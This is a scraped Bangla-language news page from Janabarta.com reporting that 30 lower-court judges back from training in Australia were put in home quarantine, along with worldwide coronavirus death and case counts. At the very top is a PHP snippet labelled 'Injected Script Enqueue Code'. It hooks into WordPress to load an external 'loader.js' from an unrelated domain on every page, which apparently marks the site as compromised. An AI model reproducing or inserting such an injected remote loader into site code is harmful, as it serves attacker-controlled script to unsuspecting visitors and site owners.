// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site কোয়ারেন্টাইনে বিদেশফেরত ৩০ বিচারক - Janabarta.com

কোয়ারেন্টাইনে বিদেশফেরত ৩০ বিচারক

জনবার্তা অনলাইনঃ বাংলাদেশে নিম্ন আদালতের ৩০ জন বিচারককে হোম কোয়ারেন্টাইনে রাখা হয়েছে। তারা অস্ট্রেলিয়া ফেরত এবং নিম্ম আদালতে কর্মরত আছেন। বুধবার (১৮ মার্চ) দুপুরে আইন মন্ত্রনালয় সূত্রে এ তথ্য নিশ্চত করা হয়েছে।

আইন মন্ত্রণালয়ের কর্মকর্তারা জানিয়েছেন, হোম কোয়ারেন্টাইনে থাকা এই বিচারকরা দুই সপ্তাহের প্রশিক্ষণে অস্ট্রেলিয়ায় গিয়েছিলেন। প্রশিক্ষণ শেষে অস্ট্রেলিয়া থেকে ফেরার পর তাদেরকে নিজেদের বাড়িতেই ১৪ দিনের কোয়ারেন্টাইনে রাখা হয়েছে।

উল্লেখ্য, করোনাভাইরাসে বিশ্বে এখন পর্যন্ত মৃতের সংখ্যা বেড়ে দাঁড়িয়েছে সাত হাজার ৯৮৯ জনে। এই প্রাণঘাতী ভাইরাসে এখন পর্যন্ত আক্রান্ত হয়েছে এক লাখ ৯৮ হাজার ৭৩০ জন। চিকিৎসা নিয়ে সুস্থ হয়ে বাড়ি ফিরেছেন ৮২ হাজার ৭৭৯ জন।

চীনের পরে এবার করোনার থাবা ইতালিতে। গত ২৪ ঘণ্টায় ইতালিতে করোনায় আক্রান্ত হয়ে মারা গেছেন ৩৪৫ জন। এ নিয়ে ইতালিতে মৃতের সংখ্যা দাঁড়িয়েছে দুই হাজার ৫০৩ জনে। ইরানে করোনায় আক্রন্ত হয়ে মৃত্যু হয়েছে ৯৮৮ জনের। সূত্র : বিবিসি